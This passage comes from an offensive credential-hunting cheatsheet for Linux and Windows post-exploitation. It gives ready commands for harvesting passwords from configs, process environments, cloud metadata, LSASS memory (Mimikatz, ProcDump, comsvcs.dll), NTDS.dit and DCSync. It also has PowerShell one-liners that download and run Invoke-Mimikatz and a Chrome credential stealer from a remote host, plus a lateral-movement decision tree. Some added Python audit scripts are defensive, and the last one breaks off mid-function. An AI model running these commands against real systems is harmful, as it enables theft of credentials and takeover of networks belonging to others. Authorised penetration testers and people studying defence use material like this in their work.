find /var/www -type f -name "*.php" -exec grep -l "password\|passwd\|mysql_connect\|mysqli_connect" {} \; 2>/dev/null
# Config files in web root
find /var/www -name "config.php" -o -name "config.inc.php" -o -name "database.php" 2>/dev/null | xargs grep -i password 2>/dev/null
# Git repositories in web root (often contain passwords)
find /var/www -name ".git" -type d 2>/dev/null
Service Configurations
Systemd Services
Service Credential Extraction
# Systemd service files
grep -r "Environment=" /etc/systemd/system/ 2>/dev/null | grep -i pass
grep -r "ExecStart=" /etc/systemd/system/ 2>/dev/null | grep -i pass
# List all services and check for credentials
systemctl list-units --type=service --all | while read service _; do
systemctl cat "$service" 2>/dev/null | grep -i "password\|token\|key"
done
# Check service environment
for service in $(systemctl list-units --type=service --state=running --no-pager | awk '{print $1}' | grep -v "^UNIT"); do
systemctl show "$service" | grep -i "environment"
done
Cron Jobs
Cron Job Credentials
# System crontabs
cat /etc/crontab
ls -la /etc/cron.*
# User crontabs
for user in $(cut -d: -f1 /etc/passwd); do
crontab -l -u $user 2>/dev/null | grep -v "^#" | grep -v "^$"
done
# Cron files that might contain passwords
grep -r "password" /etc/cron* 2>/dev/null
find /etc/cron* -type f -exec grep -l "mysql\|psql\|mongo\|redis-cli" {} \; 2>/dev/null
# Backup scripts often have credentials
find /etc/cron* -name "*backup*" -exec cat {} \; 2>/dev/null
Container & Cloud Credentials
Docker
Docker Credential Mining
# Docker config
cat ~/.docker/config.json
cat /root/.docker/config.json
# Docker compose files
find / -name "docker-compose.yml" -o -name "docker-compose.yaml" 2>/dev/null | xargs grep -i password
# Environment variables in running containers
docker inspect $(docker ps -q) | grep -i "password\|key\|token"
# Docker secrets
docker secret ls
ls -la /run/secrets/
ls -la /var/lib/docker/secrets/
# Images with embedded credentials
docker history --no-trunc $(docker images -q) | grep -i password
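A registry login in config.json is stored inline as Base64 of user:password unless a credsStore or credHelper is configured. This added Python example (not Docker's code and not part of the cheatsheet) classifies each registry in a config.json, whether on Linux or at the Windows path listed under Development Tools, so inline logins can be moved to a helper; the registries and the login are constructed.

```python
"""Show how a Docker client config.json (~/.docker/config.json) keeps registry
logins: an inline "auth" field is just Base64 of user:password, readable by
anything that can read the file, whereas credsStore / credHelpers hand the
secret to the OS keychain or a helper binary. Added example for this
cheatsheet, not Docker's own code; the config below is constructed."""
import base64
import json

def classify_registry_auths(config_text):
    """Return {registry: how its credential is stored}, flagging inline ones."""
    cfg = json.loads(config_text)
    store = cfg.get("credsStore")
    helpers = cfg.get("credHelpers", {})
    report = {}
    for registry, entry in cfg.get("auths", {}).items():
        if registry in helpers:
            report[registry] = f"credential helper '{helpers[registry]}'"
        elif entry.get("auth"):
            # docker login writes base64("user:password") here when no store or helper is configured
            user, _, password = base64.b64decode(entry["auth"]).decode("utf-8", "replace").partition(":")
            report[registry] = f"INLINE base64 user={user} password_len={len(password)}"
        elif entry.get("identitytoken") or entry.get("registrytoken"):
            report[registry] = "INLINE bearer/identity token"
        elif store:
            report[registry] = f"credsStore '{store}'"
        else:
            report[registry] = "no credential material"
    for registry, helper in helpers.items():
        report.setdefault(registry, f"credential helper '{helper}'")
    return report

def inline_registries(config_text):
    """Registries whose secret sits in the file itself (the ones worth migrating to a helper)."""
    return sorted(r for r, how in classify_registry_auths(config_text).items() if how.startswith("INLINE"))

# Constructed config: one inline login, one delegated to the `pass` store, one to ecr-login
SAMPLE_CONFIG = json.dumps({
    "auths": {
        "registry.example.internal": {"auth": base64.b64encode(b"deploy:constructed-password").decode()},
        "https://index.docker.io/v1/": {},
        "111122223333.dkr.ecr.us-east-1.amazonaws.com": {},
    },
    "credsStore": "pass",
    "credHelpers": {"111122223333.dkr.ecr.us-east-1.amazonaws.com": "ecr-login"},
})

if __name__ == "__main__":
    for registry, how in classify_registry_auths(SAMPLE_CONFIG).items():
        print(f"{registry}: {how}")
```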
Kubernetes
Kubernetes Secrets
# Kubernetes config
cat ~/.kube/config
cat /root/.kube/config
# Service account tokens
cat /var/run/secrets/kubernetes.io/serviceaccount/token
cat /run/secrets/kubernetes.io/serviceaccount/token
# Kubernetes secrets (if kubectl available)
kubectl get secrets --all-namespaces
kubectl get secret <secret-name> -o jsonpath="{.data.password}" | base64 -d
# Environment variables in pods
kubectl exec -it <pod> -- env | grep -i password
Cloud Provider Credentials
Cloud Platform Credentials
# AWS
cat ~/.aws/credentials
cat ~/.aws/config
cat /root/.aws/credentials
env | grep AWS_
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Azure
cat ~/.azure/accessTokens.json
cat ~/.azure/azureProfile.json
env | grep AZURE_
# GCP
cat ~/.config/gcloud/credentials.db
cat ~/.config/gcloud/access_tokens.db
cat ~/.config/gcloud/application_default_credentials.json
env | grep GOOGLE_
# Generic cloud-init
cat /var/lib/cloud/instance/user-data.txt
cat /var/lib/cloud/instance/user-data.txt.i
Memory & Process Credentials
Process Environment
Live Process Credential Extraction
# Check all process environments
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
if [ -r /proc/$pid/environ ]; then
tr '\0' '\n' < /proc/$pid/environ | grep -i "password\|key\|token" 2>/dev/null && echo "PID: $pid"
fi
done
# Specific process command lines
ps aux | grep -i "password\|pwd"
ps aux | grep -E "mysql|postgres|mongo|redis" | grep -v grep
# Full command line arguments
cat /proc/*/cmdline 2>/dev/null | strings | grep -i password
# Check specific service processes
for service in mysql postgresql mongodb redis apache2 nginx; do
pgrep $service | while read pid; do
[ -r /proc/$pid/environ ] && tr '\0' '\n' < /proc/$pid/environ | grep -i pass
done
done
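The `export.*PASS|KEY|TOKEN` grep over rc files in the Shell Configuration Files section and the /proc/<pid>/environ loop here are the same check on two sources. The following Python example, added here and not part of the cheatsheet or any named tool, parses both sources into name/value pairs, flags secret-bearing names whose value is set inline, and reports only the variable name and value length; the environ blob and .bashrc text are constructed.

```python
"""Report secret-bearing variables exposed through process environments
(/proc/<pid>/environ) and shell start-up files (~/.bashrc, ~/.profile). Added
example for this cheatsheet, not part of any named tool; the environ blob and
rc-file text below are constructed. Only the variable name and the value's
length are reported, so the report itself does not become a credential store."""
import os
import re

SECRET_NAME = re.compile(r"(?i)pass(word|wd)?|pwd|secret|token|api[_-]?key|private[_-]?key|credential")
# NAME=value or export NAME=value; a trailing ' # comment' is dropped
RC_ASSIGN = re.compile(r"^\s*(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)=(.*)$")
REFERENCE_PREFIXES = ("/", "$", "`", "~")  # value points elsewhere, the secret is not inline

def parse_environ(blob):
    """Split a /proc/<pid>/environ blob (NUL-separated NAME=value) into (name, value) pairs."""
    pairs = []
    for entry in blob.split(b"\0"):
        if b"=" in entry:
            name, _, value = entry.partition(b"=")
            pairs.append((name.decode(errors="replace"), value.decode(errors="replace")))
    return pairs

def parse_rc_file(text):
    """Extract NAME=value assignments, with or without export, from shell rc text."""
    pairs = []
    for line in text.splitlines():
        m = RC_ASSIGN.match(line)
        if m:
            value = m.group(2).split(" #", 1)[0].strip().strip("'\"")
            pairs.append((m.group(1), value))
    return pairs

def secret_vars(pairs):
    """Keep variables whose name looks secret-bearing and whose value is inline: [(name, value_len)]."""
    hits = []
    for name, value in pairs:
        if not value or not SECRET_NAME.search(name) or value.startswith(REFERENCE_PREFIXES):
            continue
        hits.append((name, len(value)))
    return hits

def scan_proc(proc="/proc"):
    """Walk every readable /proc/<pid>/environ and return [(pid, comm, name, value_len)]."""
    report = []
    if not os.path.isdir(proc):
        return report
    for pid in os.listdir(proc):
        if not pid.isdigit():
            continue
        try:
            with open(f"{proc}/{pid}/environ", "rb") as fh:
                blob = fh.read()
            with open(f"{proc}/{pid}/comm") as fh:
                comm = fh.read().strip()
        except OSError:
            continue  # another user's process (environ is owner-readable only) or it already exited
        for name, length in secret_vars(parse_environ(blob)):
            report.append((int(pid), comm, name, length))
    return report

def scan_rc_files(home):
    """Check the start-up files the cheatsheet lists under one home directory."""
    report = []
    for rc in (".bashrc", ".bash_profile", ".profile", ".zshrc"):
        path = os.path.join(home, rc)
        try:
            with open(path, errors="replace") as fh:
                text = fh.read()
        except OSError:
            continue
        report.extend((path, name, length) for name, length in secret_vars(parse_rc_file(text)))
    return report

# Constructed samples
SAMPLE_ENVIRON = (b"PATH=/usr/bin\0DB_PASSWORD=hunter2\0AWS_SECRET_ACCESS_KEY=abcdef0123"
                  b"\0PASSWORD_FILE=/run/secrets/pw\0HOME=/home/app\0")
SAMPLE_BASHRC = """# ~/.bashrc (constructed)
export PATH=$HOME/bin:$PATH
export GITHUB_TOKEN="constructed-example-token-value"   # inherited by every child process
MYSQL_PWD='s3cr3t'
export PGPASSFILE=~/.pgpass
alias ll='ls -la'
"""

if __name__ == "__main__":
    for pid, comm, name, length in scan_proc():
        print(f"pid {pid} ({comm}): {name} is set inline ({length} chars)")
    for path, name, length in scan_rc_files(os.path.expanduser("~")):
        print(f"{path}: {name} is set inline ({length} chars)")
```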
Memory Dumps
Memory Analysis
# Create memory dump (requires root)
gcore -o /tmp/dump <PID>
# Search memory dump for passwords
strings /tmp/dump.* | grep -i password
strings /tmp/dump.* | grep -E "^[a-zA-Z0-9+/]{20,}={0,2}$" # Base64
# Use gdb to dump process memory
gdb -p <PID> -batch -ex "dump memory /tmp/mem.dump 0x0 0xFFFFFFFFFFFFFFFF" 2>/dev/null
# LaZagne for Linux
python laZagne.py all
AUTOMATED TOOLS
Windows Credential Hunting Tools
Seatbelt
Seatbelt - Comprehensive Windows Enumeration
# Full credential audit
.\Seatbelt.exe -group=user
.\Seatbelt.exe -group=misc
.\Seatbelt.exe -group=chromium
.\Seatbelt.exe -group=remote
.\Seatbelt.exe -group=slack
# All checks (comprehensive)
.\Seatbelt.exe -group=all
# Specific credential checks
.\Seatbelt.exe CredEnum
.\Seatbelt.exe CloudCredentials
.\Seatbelt.exe ChromiumPresence
.\Seatbelt.exe FirefoxPresence
.\Seatbelt.exe IEFavorites
.\Seatbelt.exe KeePass
.\Seatbelt.exe MobaXterm
.\Seatbelt.exe PuttyHostKeys
.\Seatbelt.exe PuttySessions
.\Seatbelt.exe RDPSavedConnections
.\Seatbelt.exe SlackDownloads
.\Seatbelt.exe SuperPutty
.\Seatbelt.exe WindowsVault
# Output to file
.\Seatbelt.exe -group=all -outputfile=C:\Temp\seatbelt.txt
LaZagne (Multi-Platform)
LaZagne - All-in-One Password Recovery
# Windows - All modules
laZagne.exe all
# Specific modules
laZagne.exe browsers
laZagne.exe chats
laZagne.exe databases
laZagne.exe games
laZagne.exe git
laZagne.exe mails
laZagne.exe memory
laZagne.exe multimedia
laZagne.exe php
laZagne.exe svn
laZagne.exe sysadmin
laZagne.exe wifi
laZagne.exe windows
# Run with specific user context
laZagne.exe all -v
# Output to JSON
laZagne.exe all -oJ
SessionGopher
SessionGopher - Remote Session Extraction
# Import module
Import-Module .\SessionGopher.ps1
# Local system
Invoke-SessionGopher -Thorough
# Remote systems
Invoke-SessionGopher -ComputerName server01 -Thorough
Invoke-SessionGopher -ComputerName (Get-Content servers.txt) -Thorough
# With credentials
$cred = Get-Credential
Invoke-SessionGopher -ComputerName server01 -Credential $cred
# Output all findings
Invoke-SessionGopher -AllDomain -o output.txt
# Specific products
Invoke-SessionGopher -Product PuTTY
Invoke-SessionGopher -Product WinSCP
Invoke-SessionGopher -Product FileZilla
Invoke-SessionGopher -Product SuperPutty
Invoke-SessionGopher -Product RDP
SharpDPAPI
SharpDPAPI - DPAPI Abuse Tool
# Triage all master keys
.\SharpDPAPI.exe triage
# Decrypt credentials
.\SharpDPAPI.exe credentials
# Chrome passwords
.\SharpDPAPI.exe chrome /unprotect
# With specific master key
.\SharpDPAPI.exe blob /target:C:\Users\user\AppData\Local\Microsoft\Credentials\XXXXX /masterkey:YYYYY
# RDP files
.\SharpDPAPI.exe rdg /unprotect
# Certificates
.\SharpDPAPI.exe certificates /machine
Linux Credential Hunting Tools
LinPEAS
LinPEAS - Linux Privilege Escalation
# Full scan with password search
./linpeas.sh -a 2>&1 | tee linpeas_output.txt
# Fast mode focusing on passwords
./linpeas.sh -P
# Search for passwords in specific paths
./linpeas.sh -p /var/www,/home,/opt
# Quiet mode with interesting files only
./linpeas.sh -q
Linux Smart Enumeration (LSE)
LSE - Focused Credential Search
# Level 0 - Basic
./lse.sh
# Level 1 - Interesting files
./lse.sh -l 1
# Level 2 - Detailed search including passwords
./lse.sh -l 2
# With color output
./lse.sh -c
# Search for specific user
./lse.sh -u username
Mimipenguin
Mimipenguin - Linux Memory Passwords
# Python version
python3 mimipenguin.py
# Shell version
./mimipenguin.sh
# Dump specific process
python3 mimipenguin.py -p <PID>
CREDENTIAL HUNTING METHODOLOGY
Assessment Questions Framework
Key Questions to Answer During Assessment
Initial Access Context:
- What type of access do I have? (User/Admin/System/Root)
- What services is this system running?
- What applications are installed?
- Who else uses this system?
- What network segment am I in?
Credential Discovery Priority:
- Are there password managers installed?
- What browsers are present and used?
- Are there database clients/servers?
- What remote access tools exist?
- Are there development tools with stored credentials?
- What scheduled tasks/cron jobs are running?
- Are there any backup scripts or files?
- What cloud services are configured?
Systematic Hunting Workflow
Phase 1: Quick Wins (0-5 minutes)
Immediate High-Value Targets
Windows Quick Wins:
# 1. Check running processes for passwords
tasklist /v | findstr /i "password"
wmic process list full | findstr /i password
# 2. Check environment variables
set | findstr /i "password key token"
# 3. Recent documents
dir C:\Users\%USERNAME%\Recent
# 4. Browser saved passwords (if accessible)
cmdkey /list
# 5. Unattended install files
dir /s /b C:\*unattend*.xml C:\*sysprep*.xml
# 6. PowerShell history
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Linux Quick Wins:
# 1. History files
cat ~/.bash_history | grep -i pass
# 2. Environment variables
env | grep -i "pass\|key\|token"
# 3. Sudo cached credentials
sudo -l
# 4. Currently typed passwords in memory
ps aux | grep -i password
# 5. Recently modified files
find /home -type f -mtime -1 2>/dev/null | grep -E "\.(txt|doc|xls|conf)$"
Phase 2: User Context (5-15 minutes)
User-Specific Credential Sources
Windows User Hunting:
# Run Seatbelt for current user
.\Seatbelt.exe -group=user
# Or manually:
# 1. Browser credentials
.\SharpChrome.exe logins
# 2. Email clients
dir "%APPDATA%\Thunderbird\Profiles\*.default*\logins.json"
# 3. Cloud storage
dir "%LOCALAPPDATA%\Google\Drive\user_default\sync_config.db"
# 4. Development tools
type %USERPROFILE%\.git-credentials
type %USERPROFILE%\.aws\credentials
# 5. Remote access
reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers" /s
Linux User Hunting:
# 1. SSH keys and configs
find ~/.ssh -type f -exec cat {} \; 2>/dev/null
# 2. Database clients
[ -f ~/.my.cnf ] && cat ~/.my.cnf
[ -f ~/.pgpass ] && cat ~/.pgpass
# 3. Application configs
find ~ -name "*.conf" -o -name "*.config" -o -name "*.ini" 2>/dev/null | xargs grep -i password 2>/dev/null
# 4. Git credentials
git config --list | grep -i credential
# 5. Docker/Kubernetes
[ -f ~/.docker/config.json ] && cat ~/.docker/config.json
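Several of the files listed above (~/.pgpass, ~/.my.cnf, SSH keys, ~/.docker/config.json) are only as private as their mode bits. This added Python example (not part of the cheatsheet or any named tool) audits those files under one or all home directories for group/other read and write bits; the fixture home directory it builds is constructed in a temp dir.

```python
"""Check the per-user credential files this cheatsheet enumerates (SSH keys,
~/.my.cnf, ~/.pgpass, ~/.docker/config.json, ~/.kube/config, ~/.aws/credentials,
~/.git-credentials, ~/.netrc) for permission bits that let other local users
read or modify them. Added example for this cheatsheet, not part of any named
tool; the fixture home directory is constructed in a temp dir so the check can
be exercised anywhere. libpq refuses a ~/.pgpass that is group- or
world-accessible; the other files get the same 0600 expectation here."""
import os
import stat
import tempfile

CREDENTIAL_FILES = (
    ".ssh/id_rsa", ".ssh/id_dsa", ".ssh/id_ecdsa", ".ssh/id_ed25519",
    ".pgpass", ".my.cnf", ".netrc", ".git-credentials",
    ".docker/config.json", ".kube/config", ".aws/credentials",
)
BIT_NAMES = ((stat.S_IRGRP, "group-readable"), (stat.S_IWGRP, "group-writable"),
             (stat.S_IROTH, "world-readable"), (stat.S_IWOTH, "world-writable"))

def excess_permissions(mode):
    """Names of the group/other read and write bits set in mode (anything beyond 0600)."""
    return [name for bit, name in BIT_NAMES if mode & bit]

def audit_home(home):
    """Return [(relative_path, octal_mode, problems)] for each credential file present under home."""
    findings = []
    for rel in CREDENTIAL_FILES:
        path = os.path.join(home, rel)
        try:
            st = os.lstat(path)
        except OSError:
            continue  # file absent, or the home directory is not readable by us
        octal = oct(stat.S_IMODE(st.st_mode))
        if stat.S_ISLNK(st.st_mode):
            findings.append((rel, octal, ["symlink, audit the target instead"]))
            continue
        problems = excess_permissions(st.st_mode)
        if problems:
            findings.append((rel, octal, problems))
    return findings

def audit_all_homes(passwd="/etc/passwd"):
    """Audit every home directory from /etc/passwd that exists, keyed by user name."""
    results = {}
    try:
        with open(passwd) as fh:
            lines = fh.read().splitlines()
    except OSError:
        return results
    for line in lines:
        fields = line.split(":")
        if len(fields) >= 6 and os.path.isdir(fields[5]):
            found = audit_home(fields[5])
            if found:
                results[fields[0]] = found
    return results

def build_fixture():
    """Constructed home directory: one tight key file and two loose credential files."""
    home = tempfile.mkdtemp(prefix="credaudit-")
    os.mkdir(os.path.join(home, ".ssh"), 0o700)
    os.mkdir(os.path.join(home, ".aws"), 0o755)
    for rel, mode in ((".ssh/id_ed25519", 0o600), (".pgpass", 0o644), (".aws/credentials", 0o664)):
        path = os.path.join(home, rel)
        with open(path, "w") as fh:
            fh.write("constructed placeholder, not a real credential\n")
        os.chmod(path, mode)
    return home

if __name__ == "__main__":
    for user, found in audit_all_homes().items():
        for rel, octal, problems in found:
            print(f"{user}: ~/{rel} mode {octal}: {', '.join(problems)}")
```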
Phase 3: System-Wide Search (15-30 minutes)
Comprehensive System Analysis
Windows System Search:
# Use LaZagne for comprehensive search
.\laZagne.exe all -v
# Or Seatbelt full audit
.\Seatbelt.exe -group=all -outputfile=seatbelt_full.txt
# Manual comprehensive search
# 1. All config files
Get-ChildItem -Path C:\ -Include *.config,*.ini,*.xml -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password" | Select-Object -Unique Path
# 2. Registry sweep
reg query HKLM /f password /t REG_SZ /s > hklm_passwords.txt
reg query HKCU /f password /t REG_SZ /s > hkcu_passwords.txt
# 3. Service credentials
wmic service get name,startname,pathname
# 4. Scheduled tasks
schtasks /query /xml | findstr /i password
Linux System Search:
# Use LinPEAS
./linpeas.sh -a 2>&1 | tee linpeas_full.txt
# Or manual search
# 1. All readable files with passwords
find / -type f -readable 2>/dev/null | xargs grep -l "password" 2>/dev/null
# 2. Service configurations
find /etc -name "*.conf" -o -name "*.config" 2>/dev/null | xargs grep -i password 2>/dev/null
# 3. Web roots
find /var/www -type f -name "*.php" -o -name "*.asp" -o -name "*.config" 2>/dev/null | xargs grep -i "password\|pwd" 2>/dev/null
# 4. Backup files
find / -name "*.bak" -o -name "*.backup" -o -name "*.old" 2>/dev/null | head -20
Phase 4: Memory & Active Sessions (30+ minutes)¶
Advanced Credential Extraction
Windows Memory Analysis:
# 1. Dump LSASS (multiple methods)
# Method A: Mimikatz
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
# Method B: ProcDump
.\procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Method C: Comsvcs.dll
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Temp\lsass.dmp full
# 2. Process specific dumps
Get-Process | Where {$_.ProcessName -match "chrome|firefox|keepass"} | ForEach {
.\procdump.exe -accepteula -ma $_.Id "$($_.ProcessName)_$($_.Id).dmp"
}
# 3. Extract from dumps offline
.\mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" exit
Linux Memory Analysis:
# 1. GDB method
gdb -p $(pgrep -f "chrome|firefox|keepass") -batch -ex "dump memory app.dump 0x0 0xFFFFFFFF" 2>/dev/null
# 2. Mimipenguin
python3 mimipenguin.py
# 3. Process environment extraction
for pid in $(ps aux | grep -E "apache|nginx|mysql" | awk '{print $2}'); do
[ -r /proc/$pid/environ ] && strings /proc/$pid/environ | grep -i pass
done
# 4. Core dumps
find / -name "core.*" 2>/dev/null | while read core; do
strings "$core" | grep -i password | head -5
done
Scenario-Based Approaches¶
Scenario 1: Web Server Compromise¶
Web Server Credential Hunting Path
# 1. Identify web technology stack
ps aux | grep -E "apache|nginx|php|python|node"
netstat -tlnp | grep -E ":80|:443|:8080"
# 2. Find web roots
find / -name "www" -o -name "html" -o -name "htdocs" 2>/dev/null
# 3. Search for config files
find /var/www -name "*.php" -exec grep -l "mysql_connect\|mysqli\|PDO" {} \;
find /var/www -name ".env" 2>/dev/null
# 4. Check for git repositories
find /var/www -name ".git" -type d 2>/dev/null
# 5. Database credentials
grep -r "DB_PASSWORD" /var/www/ 2>/dev/null
# 6. Check web server logs for passwords
grep -i "password" /var/log/apache2/*.log 2>/dev/null | head -20
Scenario 2: Database Server Compromise¶
Database Server Credential Path
# 1. Identify database services
Get-Service | Where {$_.Name -like "*SQL*" -or $_.Name -like "*postgres*" -or $_.Name -like "*mysql*"}
# 2. Find database files
Get-ChildItem -Path C:\ -Include *.mdf,*.ldf,*.bak,*.sql -Recurse -ErrorAction SilentlyContinue
# 3. Connection strings in registry
reg query HKLM /f "Data Source" /t REG_SZ /s
# 4. Database client tools
dir "C:\Program Files\Microsoft SQL Server\*\Tools\Binn"
# 5. Extract from memory
Get-Process sqlservr | ForEach {.\procdump.exe -accepteula -ma $_.Id sql.dmp}
# 6. Linked servers and credentials
sqlcmd -S localhost -E -Q "SELECT * FROM sys.servers"
Scenario 3: Developer Workstation¶
Developer Machine Credential Mining
# 1. Development tools inventory
Get-ChildItem "C:\Program Files" | Where {$_.Name -match "Visual Studio|JetBrains|Git|Docker|Python|Node"}
# 2. Source code repositories
Get-ChildItem -Path C:\Users -Directory -Filter ".git" -Recurse -ErrorAction SilentlyContinue
# 3. Package managers
type C:\Users\*\.npmrc
type C:\Users\*\.pip\pip.conf
type C:\Users\*\.m2\settings.xml
# 4. Container configs
Get-ChildItem -Path C:\ -Include docker-compose.yml,Dockerfile,.env -Recurse -ErrorAction SilentlyContinue
# 5. Cloud CLIs
type C:\Users\*\.aws\credentials
type C:\Users\*\.azure\*
type C:\Users\*\.config\gcloud\*
# 6. SSH keys and configs
Get-ChildItem C:\Users\*\.ssh -Recurse
Scenario 4: Domain Controller¶
Domain Controller Credential Extraction
# 1. Extract NTDS.dit (requires DA)
ntdsutil "activate instance ntds" "ifm" "create full C:\temp\ntds" quit quit
# 2. Volume Shadow Copy
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\temp\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\
# 3. DCSync (with appropriate rights)
.\mimikatz.exe "lsadump::dcsync /domain:corp.local /all /csv" exit
# 4. SYSVOL passwords
findstr /s /i /m "password" \\dc01\sysvol\*
# 5. GPP passwords (legacy)
Get-ChildItem -Path "\\dc01\SYSVOL" -Recurse -Include "*.xml" | Select-String -Pattern "cpassword"
# 6. Backup locations
dir C:\Windows\NTDS\*.dit.bak
Credential Hunting Checklist¶
Comprehensive Checklist Matrix
| Category | Windows | Linux | Priority | Tool |
|---|---|---|---|---|
| Memory Passwords | LSASS dump | /proc/*/environ | CRITICAL | Mimikatz/Mimipenguin |
| Browser Passwords | Chrome/Edge/Firefox profiles | ~/.mozilla, ~/.config/google-chrome | HIGH | SharpChrome/LaZagne |
| Config Files | web.config, .ini, .xml | .conf, .cfg, .env | HIGH | Manual/Seatbelt |
| Database Creds | Connection strings, SSMS | .my.cnf, .pgpass | HIGH | Manual search |
| SSH Keys | PuTTY, OpenSSH | ~/.ssh/* | HIGH | SessionGopher/Manual |
| Cloud Credentials | AWS/Azure CLI configs | ~/.aws, ~/.azure | HIGH | Seatbelt/Manual |
| Service Accounts | Registry, services.msc | /etc/systemd/system | MEDIUM | PowerUp/LinPEAS |
| Scheduled Tasks | Task Scheduler, XML files | Crontab, /etc/cron* | MEDIUM | Seatbelt/LinPEAS |
| Command History | PSReadLine, cmd history | .bash_history, .*_history | MEDIUM | Manual |
| Auto-logon | Registry Winlogon | /etc/gdm*/custom.conf | MEDIUM | Manual/LaZagne |
| VPN Configs | OpenVPN, Cisco AnyConnect | /etc/openvpn | MEDIUM | Manual |
| Password Managers | KeePass, LastPass, 1Password | KeePassX, pass | LOW | KeeThief/Manual |
| Email Clients | Outlook PST/OST | Thunderbird, Evolution | LOW | Manual/LaZagne |
| Backup Files | .bak, .old | .backup, ~ | LOW | Manual search |
| Log Files | Event logs, app logs | /var/log/* | LOW | Manual grep |
Quick Reference Commands¶
Copy-Paste Ready One-Liners
Windows Power Commands:
# All passwords in 30 seconds
cmd /c "cmdkey /list & findstr /si password *.txt *.xml *.config & reg query HKLM /f password /t REG_SZ /s & type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
# Quick memory cred dump
powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
# Fast browser creds
powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/Get-ChromeCreds.ps1'); Get-ChromeCreds"
Linux Power Commands:
# All passwords in 30 seconds
find / -type f -readable 2>/dev/null | xargs grep -i "password\|passwd\|pwd" 2>/dev/null | head -50
# Quick sensitive files
find / \( -name "*.conf" -o -name "*.config" -o -name "*.ini" -o -name ".env" \) -readable 2>/dev/null | xargs grep -l password 2>/dev/null
# Fast memory passwords
ps aux | grep -v grep | awk '{print $2}' | while read p; do strings /proc/$p/environ 2>/dev/null | grep -i pass; done
CPTS Credential Hunting Decision Tree¶
Strategic Decision Making
```mermaid
graph TD
    A[Initial Access] --> B{Admin/Root?}
    B -->|Yes| C[Memory Dump First]
    B -->|No| D[User Context Search]
    C --> E[LSASS/Process Memory]
    E --> F{Got Domain Creds?}
    F -->|Yes| G[Plan Lateral Movement]
    F -->|No| H[System-Wide Search]
    D --> I[Browser/Config Files]
    I --> J{Found Creds?}
    J -->|Yes| K[Test Credential Reuse]
    J -->|No| L[Expand Search Scope]
    K --> M{Works Elsewhere?}
    M -->|Yes| N[Lateral Movement]
    M -->|No| O[Continue Hunting]
    L --> P[Service Configs]
    P --> Q[Database Creds]
    Q --> R[Scheduled Tasks]
    G --> S[Target High-Value Systems]
    N --> S
    S --> T{Domain Admin Path?}
    T -->|Yes| U[Execute Attack Chain]
    T -->|No| V[Find Pivot Point]
```
Credential Prioritization Matrix¶
Which Credentials to Pursue First
| Credential Type | Value | Effort | Priority | Why |
|---|---|---|---|---|
| Domain Admin | 10/10 | Varies | CRITICAL | Game over |
| Local Admin (multiple systems) | 9/10 | Low | CRITICAL | Lateral movement |
| Service Account (high priv) | 8/10 | Medium | HIGH | Often over-privileged |
| Database SA/root | 8/10 | Low | HIGH | Data access + possible RCE |
| User with special access | 7/10 | Low | HIGH | Business logic bypass |
| Cloud credentials | 9/10 | Low | HIGH | Scope expansion |
| VPN/Remote access | 7/10 | Medium | MEDIUM | Network pivot |
| Regular domain user | 5/10 | Low | MEDIUM | AD enumeration |
| Local service account | 4/10 | Low | LOW | Limited use |
| Application-specific | 3/10 | High | LOW | Unless critical app |
Post-Exploitation Credential Management¶
Organizing Found Credentials
Credential Database Structure:
| Username | Password/Hash | Type | Source | System | Verified | Notes |
|---|---|---|---|---|---|---|
| admin | Summer2024! | Clear | web.config | WEB01 | Yes | IIS App Pool |
| sa | 5f4dcc3b5aa765d61d8327deb882cf99 | NTLM | Memory | SQL01 | Yes | SQL Server |
| john.doe | [SSH_KEY] | Key | .ssh/id_rsa | DEV01 | No | Encrypted key |
| svc_backup | Pass123 | Clear | Task Scheduler | DC01 | Yes | Backup script |
Password Patterns to Note:
- Season+Year (Summer2024, Winter23)
- Company+Number (Contoso123)
- Keyboard walks (qwerty, 1qaz2wsx)
- Default passwords unchanged
- Incremental passwords (Pass1, Pass2)
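Tagging each recorded password with one of the pattern families above keeps the credential log consistent and makes the weak-password findings in the report concrete. The following classifier is an added example, not code from the original cheat sheet; the company name list is a per-engagement input it assumes, the default-password and keyboard-walk lists are short constructed samples, and `SAMPLE_RECORDS` is a constructed credential log in the shape of the table above.

```python
import re

# Pattern families from the list above. Company names are a per-engagement input the
# classifier cannot know on its own, so they are passed in (assumed, not from the page).
SEASONS = ("spring", "summer", "autumn", "fall", "winter")
KEYBOARD_WALKS = ("qwerty", "asdfgh", "zxcvbn", "1qaz2wsx", "qazwsx", "1q2w3e", "123456")
DEFAULT_PASSWORDS = {"admin", "password", "changeme", "welcome", "letmein", "root", "guest"}
SEASON_YEAR_RE = re.compile(r"^(%s)(19|20)?\d{2}[^a-z0-9]*$" % "|".join(SEASONS), re.I)
WORD_NUMBER_RE = re.compile(r"^([a-z]+)(\d+)[^a-z0-9]*$", re.I)

def classify_password(password, company_names=()):
    """Return the first matching pattern family for a single password, or None."""
    lowered = password.lower()
    if SEASON_YEAR_RE.match(password):
        return "season+year"
    if re.sub(r"[\d!@#$%^&*.]+$", "", lowered) in DEFAULT_PASSWORDS:
        return "default"                 # unchanged default, possibly with a suffix
    if any(walk in lowered for walk in KEYBOARD_WALKS):
        return "keyboard-walk"
    m = WORD_NUMBER_RE.match(password)
    if m:
        word = m.group(1).lower()
        if word in {c.lower() for c in company_names}:
            return "company+number"
        return "word+number"             # Pass123, Backup2 and similar
    return None

def classify_records(records, company_names=()):
    """Tag each (account, password) record; a base word seen with more than one
    numeric suffix across the set is re-tagged as an incremental series."""
    suffixes = {}
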